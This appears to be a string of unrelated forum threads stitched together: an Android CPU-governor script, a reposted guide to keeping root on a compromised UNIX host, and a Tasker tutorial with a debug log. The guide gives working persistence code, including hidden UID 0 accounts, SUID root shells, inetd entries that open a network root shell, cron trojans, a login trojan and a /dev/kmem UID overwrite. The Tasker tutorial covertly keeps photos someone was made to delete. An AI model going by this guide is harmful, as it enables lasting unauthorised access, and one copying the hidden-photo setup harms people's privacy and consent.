echo $AWAKE_GOVERNOR_FREQENCY_MAX > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
fi
if [ $AWAKE_GOVERNOR = "ondemand" ]; then
echo $AWAKE_SAMPLING_RATE > /sys/devices/system/cpu/cpufreq/ondemand/sampling_rate
fi
log -p i -t screenstate_scaling "*** awake ***: switching CPU frequency governor to -> $AWAKE_GOVERNOR"
AWAKE=
fi
SLEEPING=`cat /sys/power/wait_for_fb_sleep`
if [ $SLEEPING = "sleeping" ] && [ ! "`pidof $SETCPU`" ]; then
echo $SLEEP_GOVERNOR_FREQENCY_MIN > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
echo $SLEEP_GOVERNOR_FREQENCY_MAX > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
echo $SLEEP_GOVERNOR > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
log -p i -t screenstate_scaling "*** sleeping ***: switching CPU frequency governor to -> $SLEEP_GOVERNOR"
SLEEPING=
fi
done &)
i dont want to sound silly, but isnt it "easier" to simply use SetCPU?
waebi said:
i dont want to sound silly, but isnt it "easier" to simply use SetCPU?
Click to expand...
Click to collapse
Yes it is, but i think that in oxygen clean rom is more important
I find it better than having yet another app boot up at start.
Wont the handset be sluggish to wake from 245MHZ and powersave governor?!
Jagdish84 said:
Wont the handset be sluggish to wake from 245MHZ and powersave governor?!
Click to expand...
Click to collapse
I dunno, I set it to interactive: SLEEP_GOVERNOR="interactive"
.
I just think that interactive in combination with scaling down is just as "power-saving" as ondemand in the end, and it feels faster
twicejr said:
I dunno, I set it to interactive: SLEEP_GOVERNOR="interactive"
.
I just think that interactive in combination with scaling down is just as "power-saving" as ondemand in the end, and it feels faster
Click to expand...
Click to collapse
I agree, i got mixed up didnt notice you were using interactive
i would give it a shot but i aint using oxygen rom and ssts aint lying in init.d...
nice script nontheless
I thought this was interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in code but you the idea
Dear XDA-Members
After some have requested me to post my tasker profile here is a noob friendly walk trough.
This is the first time I make a tutorial like this so any corrections are more then welcome (since English isn't my native language)
I haven't made this fully on my own, some ideas I got from other posts.
So here it goes:
It was hard to find a good trigger for the task to start and I decided to add it to opening/closing of the camera app.
Profiles:
Application -> (Your default photo app (you can add more then one)
Start task:
Variable / Variable set / name = %Camerastart / To %TIMES - 15 //Set a variable so you can later compare which photos are new and which are old
Exit task:
1. File / List FIles / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
2. Task / For / Variable = %File / Items = %Files(1 // For every variable do the next loop
-3. File / Test File / Type = Modified / Data = %File / Store result In = %Filetime / Continue Task After Error = True // Look when the photo was taken (modified)
-4. Task / If / Condition = %Filetime > %Camerastart // Compare the variables to see if the photo is either new or old
--5. File / Copy File / From = %File / To = DCIM/Backup (Location of folder you want to copy the new photos too) / (Use root = true // optional) // If true copy the photo to another map
-6. Task / End If // Self explanatory
7. Task / End for // End the loop
I Hope you guys liked this tutorial and I helped some of you out.
I also uploaded the .txt file, rename it to .xml so you can easily import it to tasker. (This was made with the newest version (4.5u1)
Edit: Forgot to add one thing, add a file named .nomedia to the folder where you place the extra photos (Do this with root explorer or some other that displays hidden items), this will prevent the photos from displaying in the gallery app.
// Old
Dear XDA-Members,
I'm not sure if something like this already exists but after a while of searching I haven't found anything like this.
We probably all had one of those moments in our life that we took a photo of something or someone that we wanted to keep really badly but someone forced us to delete it from the gallery.
So my idea was that after a photo gets taken by the camera app and saved to the default location /sdcard/DCIM/camera (or other place, dependence on the camera app (possibly customizable setting?)) a backup is instantly made to a folder (of choice) that isn't displayed in any gallery. And I know dropbox could instantly sync this to the cloud but this firstly drains my data plan and you can't save it locally and only on the cloud (not talking about the huge amount of battery that is drained).
Maybe it's easier to make a camera app that saves a photo on 2 places (one displayed in the gallery and the other one is saved in a secret folder that you can assign yourself and see with the most file browsers.)
I hope you guys like this idea and maybe someone could work this out if they have the time for it.
tldr; Lightweight app that secretly 'backups' photos to a secret folder that isn't displayed in the gallery app.
Sorry for my English, it isn't my native language.
Tasker can do that
Tasker?
mushipkw said:
Tasker can do that
Click to expand...
Click to collapse
What would be the trigger event then?
I have explored all the tasker options but weren't able to find anything that could reproduce this.
Tasker worked
Mikhail5555 said:
What would be the trigger event then?
I have explored all the tasker options but weren't able to find anything that could reproduce this.
Click to expand...
Click to collapse
Wow, I can't believe how powerful tasker actually is.
I managed to make a task for backing up photos made by my standard camera. It took me an hour but it is working now.
If anyone interested in the task send me a pm and I will send the task.
Mikhail5555 said:
Dear XDA-Members
After some have requested me to post my tasker profile here is a noob friendly walk trough.
This is the first time I make a tutorial like this so any corrections are more then welcome (since English isn't my native language)
I haven't made this fully on my own, some ideas I got from other posts.
So here it goes:
It was hard to find a good trigger for the task to start and I decided to add it to opening/closing of the camera app.
Profiles:
Application -> (Your default photo app (you can add more then one)
Start task:
Variable / Variable set / name = %Camerastart / To %TIMES - 15 //Set a variable so you can later compare which photos are new and which are old
Exit task:
1. File / List FIles / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
2. Task / For / Variable = %File / Items = %Files(1 // For every variable do the next loop
-3. File / Test File / Type = Modified / Data = %File / Store result In = %Filetime / Continue Task After Error = True // Look when the photo was taken (modified)
-4. Task / If / Condition = %Filetime > %Camerastart // Compare the variables to see if the photo is either new or old
--5. File / Copy File / From = %File / To = DCIM/Backup (Location of folder you want to copy the new photos too) / (Use root = true // optional) // If true copy the photo to another map
-6. Task / End If // Self explanatory
7. Task / End for // End the loop
I Hope you guys liked this tutorial and I helped some of you out.
I also uploaded the .txt file, rename it to .xml so you can easily import it to tasker. (This was made with the newest version (4.5u1)
// Old
Dear XDA-Members,
I'm not sure if something like this already exists but after a while of searching I haven't found anything like this.
We probably all had one of those moments in our life that we took a photo of something or someone that we wanted to keep really badly but someone forced us to delete it from the gallery.
So my idea was that after a photo gets taken by the camera app and saved to the default location /sdcard/DCIM/camera (or other place, dependence on the camera app (possibly customizable setting?)) a backup is instantly made to a folder (of choice) that isn't displayed in any gallery. And I know dropbox could instantly sync this to the cloud but this firstly drains my data plan and you can't save it locally and only on the cloud (not talking about the huge amount of battery that is drained).
Maybe it's easier to make a camera app that saves a photo on 2 places (one displayed in the gallery and the other one is saved in a secret folder that you can assign yourself and see with the most file browsers.)
I hope you guys like this idea and maybe someone could work this out if they have the time for it.
tldr; Lightweight app that secretly 'backups' photos to a secret folder that isn't displayed in the gallery app.
Sorry for my English, it isn't my native language.
Click to expand...
Click to collapse
Excellent, just what i was looking for. Great tutorial.
---------- Post added at 01:29 AM ---------- Previous post was at 01:19 AM ----------
Might want to change the title of the post
Since your request was pretty much solved by yourself.
GerManiac said:
Excellent, just what i was looking for. Great tutorial.
---------- Post added at 01:29 AM ---------- Previous post was at 01:19 AM ----------
Might want to change the title of the post
Since your request was pretty much solved by yourself.
Click to expand...
Click to collapse
Completely forgot about the title, sorry [emoji15]
How you import?
eloko said:
How you import?
Click to expand...
Click to collapse
Just follow the instructions and make it yourself, the directories might not work if you import
eloko said:
How you import?
Click to expand...
Click to collapse
Otherwise download the .txt file, rename it to .xml and import it into tasker. (Don't forget to change the dirs)
Mikhail5555 said:
Otherwise download the .txt file, rename it to .xml and import it into tasker. (Don't forget to change the dirs)
Click to expand...
Click to collapse
I don't see the option to import.
I try when I have the chance to be on pc.
Thanks
Mikhail5555 said:
Exit task:
1. File / List FIles / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
Click to expand...
Click to collapse
Thanks for the very nice tutorial of yours
I have a question or rather a problem!
What if I wanted to make a backup of videos too, how should I add to the list?
M S T F said:
Thanks for the very nice tutorial of yours
I have a question or rather a problem!
What if I wanted to make a backup of videos too, how should I add to the list?
Click to expand...
Click to collapse
Thanks for the nice words, It is actually pretty easy to add more files to the list of items that are gettings copied.
Exit task:
1. File / List FIles / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
Just edit the "Match = *.jpg" to for instant "Match = *.jpg/*.mp4/*.png".
The / means OR so you can add almost all the file extentions that you want and/or need.
Don't forget the scan will take longer the more items you add.
Mikhail5555 said:
Thanks for the nice words, It is actually pretty easy to add more files to the list of items that are gettings copied.
Exit task:
1. File / List FIles / Dir = DCIM/Camera (Location of the map the photos go in) / Match = *.jpg / Variable = %Files // For each file in the folder create a variable
Just edit the "Match = *.jpg" to for instant "Match = *.jpg/*.mp4/*.png".
The / means OR so you can add almost all the file extentions that you want and/or need.
Don't forget the scan will take longer the more items you add.
Click to expand...
Click to collapse
Thanks for the reply,
After adding mp4 to the list I ran into error, as you can see in the following screenshot.
Actually the remaining photos after the first video file in the folder aren't backed up. but the first video file itself is copied to the destination folder.
Any idea what could be the reason
M S T F said:
Thanks for the reply,
After adding mp4 to the list I ran into error, as you can see in the following screenshot.
Actually the remaining photos after the first video file in the folder aren't backed up. but the first video file itself is copied to the destination folder.
Any idea what could be the reason
Click to expand...
Click to collapse
Try disabling 'use root', i'm not sure why the copying times out though
Could you also show the bottem lines from the error that tasker gives?
Mikhail5555 said:
Try disabling 'use root', i'm not sure why the copying times out though
Could you also show the bottem lines from the error that tasker gives?
Click to expand...
Click to collapse
Here I have copied the whole log for your consideration. I am looking forward for a solution.:good:
Code:
16.28.14/Variables doreplresult: |%File| -> |/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4|
16.28.14/Variables doreplresult: |%File| -> |/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4|
16.28.14/Shell runSync test -e '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' root: true timeout: 3000
16.28.14/Shell have process
16.28.14/Shell write cmd: test -e '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process timeout timer 3000ms for: test -e '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process-thread ID 530
16.28.14/Shell joined with 530
16.28.14/Shell exit result: 0
16.28.14/Shell non-null timeout
16.28.14/Shell runSync test -f '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' root: true timeout: 3000
16.28.14/Shell have process
16.28.14/Shell write cmd: test -f '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process timeout timer 3000ms for: test -f '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process-thread ID 532
16.28.14/Shell joined with 532
16.28.14/Shell exit result: 0
16.28.14/Shell non-null timeout
16.28.14/Shell runSync test -d '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' root: true timeout: 3000
16.28.14/Shell have process
16.28.14/Shell write cmd: test -d '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process timeout timer 3000ms for: test -d '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4'
16.28.14/Shell start process-thread ID 534
16.28.15/Shell joined with 534
16.28.15/Shell exit result: 1
16.28.15/Shell non-null timeout
16.28.15/Shell runSync test -e '/storage/extSdCard/Camera-Backup' root: true timeout: 3000
16.28.15/Shell have process
16.28.15/Shell write cmd: test -e '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 3000ms for: test -e '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 536
16.28.15/Shell joined with 536
16.28.15/Shell exit result: 0
16.28.15/Shell non-null timeout
16.28.15/Shell runSync test -f '/storage/extSdCard/Camera-Backup' root: true timeout: 3000
16.28.15/Shell have process
16.28.15/Shell write cmd: test -f '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 3000ms for: test -f '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 538
16.28.15/Shell joined with 538
16.28.15/Shell exit result: 1
16.28.15/Shell non-null timeout
16.28.15/Shell runSync test -d '/storage/extSdCard/Camera-Backup' root: true timeout: 3000
16.28.15/Shell have process
16.28.15/Shell write cmd: test -d '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 3000ms for: test -d '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 540
16.28.15/Shell joined with 540
16.28.15/Shell exit result: 0
16.28.15/Shell non-null timeout
16.28.15/Shell runSync cp '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' '/storage/extSdCard/Camera-Backup' root: true timeout: 7000
16.28.15/Shell have process
16.28.15/Shell write cmd: cp '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process timeout timer 7000ms for: cp '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' '/storage/extSdCard/Camera-Backup'
16.28.15/Shell start process-thread ID 542
16.28.22/Shell joined with 542
16.28.22/Shell exit result: 9
16.28.22/Shell non-null timeout